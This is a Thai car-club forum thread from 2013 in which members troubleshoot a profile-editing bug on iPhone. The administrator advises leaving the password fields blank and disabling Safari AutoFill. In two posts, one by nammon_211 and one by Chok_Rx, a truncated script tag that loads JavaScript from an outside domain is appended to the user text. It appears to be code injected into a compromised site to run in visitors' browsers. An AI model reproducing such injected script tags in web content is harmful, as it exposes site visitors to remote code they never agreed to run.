ตอบ
monza

ชื่อเล่น: อิฉัน

เข้าร่วม: 20 มิถุนา 2012
ตอบ: 804

Guru ES
Guru ES

ได้รับคำขอบคุณ: 867
ให้คำขอบคุณ: 773

ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 5 ตุลา 2013 11:23 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
เวลาแก้ไข ส่วนของ. ข้อมุลส่วนตัว. ทำไมต้องใส่แบบนี้ทุกครั้ง. ต่อจากความเดิม มาม่าหน่อยนะคะ
Shoke พิมพ์ว่า:
จากรูปที่แจ้งสีแดง invalid email address
ก็คือใส่อีเมล์ไม่ถูกครับ

คือขอเรียนว่า ล๊อคอิน ไอดี และ พาสเวิสด์ ปกติ เข้าใช้งานได้ แต่ เข้าข้อมุลส่วนตัว มันเหมือนติดบัคคะ. คือว้า จะแก้ไข เปลี่ยนภาพโปรไฟล. ทุกครั้ง ย้ำคะ ทุกครั้ง จะต้องมาใส่ อีเมล์ แล้วอย่างไร ทราบไหมคะ. มันขึ้นฟ้องคะ เป็น ข้อความ text box คะ ว่า พาสเวิสด์ ไม่ตรง กรุณาใส่พาสเวิสด์ คือ มันจะใส่ ได้อย่างไร ไช่ไหมคะ ถ้าจะใส่ คือการเปลี่ยนพาสเดิม ให้ เป็นพาสใหม่ ในเพจนี้ ไช่ไหมคะ. ทำอย่างไรละคะ. ดิฉันก็ใส่ตามที่ text box มันฟัอง คะ. โดยการ แก้ไขให้ใส่พาสเดิม ไป แล้วก๋เปลี่ยนพาสใหม่ ตาม หน้าเพจ เลย แล้วจากนั้นก็เปลี่ยนโปรไฟล ถึงจะสำเร็จ คะ. อ่านแล้วเข้าใจไหมคะ ว่าเหมือนมันติดบัค อีเมล์ กับ พาสเวิสด์ ทั้งๆ ที่ เข้าสุ่ระบบมาได้ โดยไอดี พาสเวิสด์แล้ว
ตัวอย่างภาพ

เพราะระบบ เปลี่ยนไปหรือคะ. ขอบคุณคะ
เพราะระบบ เปลี่ยนไปหรือคะ. ขอบคุณคะ
นี่ใส่อีเมล์ไป ยังไม่พอคะ มันฟ้องพาสเวิส
นี่ใส่อีเมล์ไป ยังไม่พอคะ มันฟ้องพาสเวิส
ทุกครั้งที่มีการเปลี่ยนโปรไฟล จะต้องให้เปลี่ยนพาสเวิสด้วยหรือคะ. อ่อแล้วทำได่เสร็จ คอมมาคตรงนั้นก็ยังขึ้น monza แล้วก็ ตามภาพอีกเช่นเดิม
ทุกครั้งที่มีการเปลี่ยนโปรไฟล จะต้องให้เปลี่ยนพาสเวิสด้วยหรือคะ.  อ่อแล้วทำได่เสร็จ คอมมาคตรงนั้นก็ยังขึ้น monza  แล้วก็ ตามภาพอีกเช่นเดิม

แก้ไขล่าสุดโดย เมื่อ จันทร์, 7 ตุลา 2013 08:50, ทั้งหมด 3 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: Thetom 
phasit

เข้าร่วม: 22 กุมภา 2013
ตอบ: 1522

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1144
ให้คำขอบคุณ: 2814

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 5 ตุลา 2013 13:00 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
น่าจะเป็นการยืนยันตัวบุคคลครับ...ป้องกันการโดนแฮก
ไม่รู้ใช่หรือป่าวถ้าไม่ใช่ต้องขอโทษครับ
ได้รับคำขอบคุณจาก: monza 
inkman

ชื่อเล่น: วี

เข้าร่วม: 16 กรกฎา 2013
ตอบ: 497

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 247
ให้คำขอบคุณ: 329

ปี: 2005
เสาร์, 5 ตุลา 2013 13:36 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
....
mutisaru

ชื่อเล่น: อ้อม

เข้าร่วม: 26 พฤษภาคม 2012
ตอบ: 691

Guru ES
Guru ES

ได้รับคำขอบคุณ: 549
ให้คำขอบคุณ: 539

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 5 ตุลา 2013 14:20 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
ของผมยังไม่เคยเจอนะครับ จะเข้าไปดูก้อเข้าได้ปกติ ระหว่างตอบกระทู้นี่ก้อลองเปิดดูอยู่เลยครับ
N_J Civic

เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 5 ตุลา 2013 14:43 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
ไม่มีนิน้องมน
ลองถามโช้คดูซิ
SkyMaN_RaYoNg

ชื่อเล่น: เปเล่

เข้าร่วม: 05 พฤษภาคม 2011
ตอบ: 882

Guru ES
Guru ES

ได้รับคำขอบคุณ: 540
ให้คำขอบคุณ: 3979

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 5 ตุลา 2013 14:44 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
เก็บข้อมุล
tokmun002

ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 5 ตุลา 2013 14:49 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
ผมก็ขึ้นครับ
wut-chiangmai

ชื่อเล่น: วุฒิ

เข้าร่วม: 28 มีนา 2009
ตอบ: 2094

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3937
ให้คำขอบคุณ: 5037

ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 5 ตุลา 2013 14:54 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
ต้องการแก้ไขส่วนใดอ่าครับ

ถ้าแก้ไขข้อมูลทั่ว ๆ ไป ด้านล่าง ๆ ไม่ต้องกรอกช่องข้างบนได้นะครับ เว้นได้เลย
Dolza-za

เข้าร่วม: 24 กันยา 2013
ตอบ: 256

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 66
ให้คำขอบคุณ: 1
เสาร์, 5 ตุลา 2013 14:55 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
เก็บข้อมูลครับ
monza

Guru ES
Guru ES

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 5 ตุลา 2013 18:42 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
คืออิฉัน จะเปลี่ยนรูปภาพโปรไฟล์คะ. แต่มันกลับโชว์ที่บอกไปคะ โดยเมื้อก่อนจะเปลี่ยนโปรไฟลรุป ก็ดึงภาพมาใส่แล้ว ตกลงได้เลยนี่. พวกท่านลองเปลี่ยนรุปโปรไฟลดุสิคะ เป็นเกมือนอิฉันไหม
Shoke

ชื่อเล่น: โช้คอัพ

เข้าร่วม: 31 กรกฎา 2008
ตอบ: 1444

Administrator

ได้รับคำขอบคุณ: 6862
ให้คำขอบคุณ: 2301

สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 6 ตุลา 2013 03:20 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
จากรูปที่แจ้งสีแดง invalid email address
thanatphong

เข้าร่วม: 05 มิถุนา 2009
ตอบ: 2693

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5343
ให้คำขอบคุณ: 20

ปี: 2002
อาทิตย์, 6 ตุลา 2013 03:34 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว

Thank you so much...
nammon_211

ชื่อเล่น: น้ำมนต์

เข้าร่วม: 12 มิถุนา 2013
ตอบ: 2081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1949
ให้คำขอบคุณ: 1031

สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 6 ตุลา 2013 07:12 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
ผมไม่เปนคับ เปลี่ยนรูปมา.....หลายรูปแล้ว <script src="https://sport32news.com/civicesgroup.js"></
porche35

ชื่อเล่น: บอย

เข้าร่วม: 22 สิงหา 2013
ตอบ: 1098

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 797
ให้คำขอบคุณ: 329

สี: น้ำเงิน อิเทอนอล (B-96P)
อาทิตย์, 6 ตุลา 2013 20:42 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว

kavinthorn

ชื่อเล่น: ต่อ

เข้าร่วม: 26 กันยา 2012
ตอบ: 1539

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1314
ให้คำขอบคุณ: 701

จันทร์, 7 ตุลา 2013 09:59 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
มาเก็บข้อมูลคร๊าบบ ผม
Shoke

จันทร์, 7 ตุลา 2013 11:06 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
monza พิมพ์ว่า:
เวลาแก้ไข ส่วนของ. ข้อมุลส่วนตัว. ทำไมต้องใส่แบบนี้ทุกครั้ง. ต่อจากความเดิม มาม่าหน่อยนะคะ

คือขอเรียนว่า ล๊อคอิน ไอดี และ พาสเวิสด์ ปกติ เข้าใช้งานได้ แต่ เข้าข้อมุลส่วนตัว มันเหมือนติดบัคคะ. คือว้า จะแก้ไข เปลี่ยนภาพโปรไฟล. ทุกครั้ง ย้ำคะ ทุกครั้ง จะต้องมาใส่ อีเมล์ แล้วอย่างไร ทราบไหมคะ. มันขึ้นฟ้องคะ เป็น ข้อความ text box คะ ว่า พาสเวิสด์ ไม่ตรง กรุณาใส่พาสเวิสด์ คือ มันจะใส่ ได้อย่างไร ไช่ไหมคะ ถ้าจะใส่ คือการเปลี่ยนพาสเดิม ให้ เป็นพาสใหม่ ในเพจนี้ ไช่ไหมคะ. ทำอย่างไรละคะ. ดิฉันก็ใส่ตามที่ text box มันฟัอง คะ. โดยการ แก้ไขให้ใส่พาสเดิม ไป แล้วก๋เปลี่ยนพาสใหม่ ตาม หน้าเพจ เลย แล้วจากนั้นก็เปลี่ยนโปรไฟล ถึงจะสำเร็จ คะ. อ่านแล้วเข้าใจไหมคะ ว่าเหมือนมันติดบัค อีเมล์ กับ พาสเวิสด์ ทั้งๆ ที่ เข้าสุ่ระบบมาได้ โดยไอดี พาสเวิสด์แล้ว
ตัวอย่างภาพ

หากต้องการเปลี่ยนรูปประจำตัว ให้ browse รูปได้เลยครับ
ช่อง password ทั้ง 3 ช่อง ไม่ต้องกรอกครับ (กรอกเมื่อต้องการเปลี่ยนรหัสผ่านเท่านั้น)
monza

Guru ES
Guru ES

จันทร์, 7 ตุลา 2013 12:24 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว

ตัวอย่างภาพ

หากต้องการเปลี่ยนรูปประจำตัว ให้ browse รูปได้เลยครับ
ช่อง password ทั้ง 3 ช่อง ไม่ต้องกรอกครับ (กรอกเมื่อต้องการเปลี่ยนรหัสผ่านเท่านั้น)

ปัญหาที่เกิดขึ้นทั้งหมด เกิดจากยูสเซอร์ไช้งานบนไอโฟนคะ  เลยลองเปลี่ยนมาใช้งานผ่าน PC คือใช้งานได้ปกติคะ แล้วแบบนี้จะถามอีกครั้งคะว่า ยูสเซอร์ท่านอื่นที่ใช้งานผ่านไอโฟน มีปัญหาเหมือนดิฉันหรือไม่คะ
Shoke

จันทร์, 7 ตุลา 2013 15:55 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว

ตัวอย่างภาพ

ปัญหาที่เกิดขึ้นทั้งหมด เกิดจากยูสเซอร์ไช้งานบนไอโฟนคะ  เลยลองเปลี่ยนมาใช้งานผ่าน PC คือใช้งานได้ปกติคะ แล้วแบบนี้จะถามอีกครั้งคะว่า ยูสเซอร์ท่านอื่นที่ใช้งานผ่านไอโฟน มีปัญหาเหมือนดิฉันหรือไม่คะ

กรณี iPhone ป้อน password เอง
ให้ปิด AutoFill ครับ
- Settings > Safari > AutoFill > Names & Passwords [OFF]

Settings > Safari > AutoFill
Settings > Safari > AutoFill
Names & Passwords [OFF]
Names & Passwords [OFF]
ได้รับคำขอบคุณจาก: monza  mutisaru 
monza

Guru ES
Guru ES

จันทร์, 7 ตุลา 2013 16:43 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
ขอบคุณคะ
Chok_Rx

ตอบ: 235

ได้รับคำขอบคุณ: 336
ให้คำขอบคุณ: 843

อังคาร, 3 ธันวา 2013 18:52 - เพื่อนท่านใดเป็นแบบผมบ้าง *Invalid Email Address
ปกติหรือไม่ปกติ ขอคำชี้แนะหน่อยครับ

Attached File :
เพื่อนท่านใดเป็นแบบผมบ้าง *Invalid Email Address
N_J Civic

เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 3 ธันวา 2013 18:59 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
เอ่อ...แบบว่างงอ่ะครับ
Email address มันต้องมีให้ครบไม่ใช่เหรอ xxxx@xxxx.com อะไรประมาณนี้ ที่ใส่มาเหมือนยังไม่ครบอ่ะ
ได้รับคำขอบคุณจาก: Chok_Rx 
Chok_Rx

อังคาร, 3 ธันวา 2013 19:21 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
ก่อนหน้านี้เป็นEmail แต่อยู่ดีๆก็เป็นแบบในรูปอะครับ
Chok_Rx

อังคาร, 3 ธันวา 2013 19:32 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
ใส่Emailใหม่ และ Passwordใหม่ก็ยังเป็นเหมือนเดิม
ปล.ผมใช้Gmail ครับ
Shoke

อังคาร, 3 ธันวา 2013 19:35 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
Chok_Rx พิมพ์ว่า:
ใส่Emailใหม่ และ Passwordใหม่ก็ยังเป็นเหมือนเดิม
ปล.ผมใช้Gmail ครับ

ใส่ email ให้ถูก
และใส่ password ด้านล่างอีก 2 บรรทัดครับ

ได้รับคำขอบคุณจาก: Chok_Rx 
Chok_Rx

อังคาร, 3 ธันวา 2013 19:59 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
รู้แล้วครับ !!!<script src="https://sport32news.com/civicesgroup.js"></
ในรูปผมเปิดใน Iphone4 แต่ลองเปิดใน Computer ก็เป็น Email ปกติ 

ท่านใดที่ใช้ Iphone4 ลองเข้าไปดูว่าเป็นเหมือนผมรึป่าว 555 
ขอบคุณครับที่ให้คำแนะนำ

monza

Guru ES
Guru ES

อังคาร, 10 ธันวา 2013 23:01 - แก้ไข ปัญหาต่าๆ เกิดจากการเข้าใช้ในระบบมือถือ เพราะลองใช้ในคอมพิวเตอร์ไม่เกิดปัญหาดังกล่าว
ถ้าจะตั้งค่าระบบแอนดรอย ทำไงคะ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.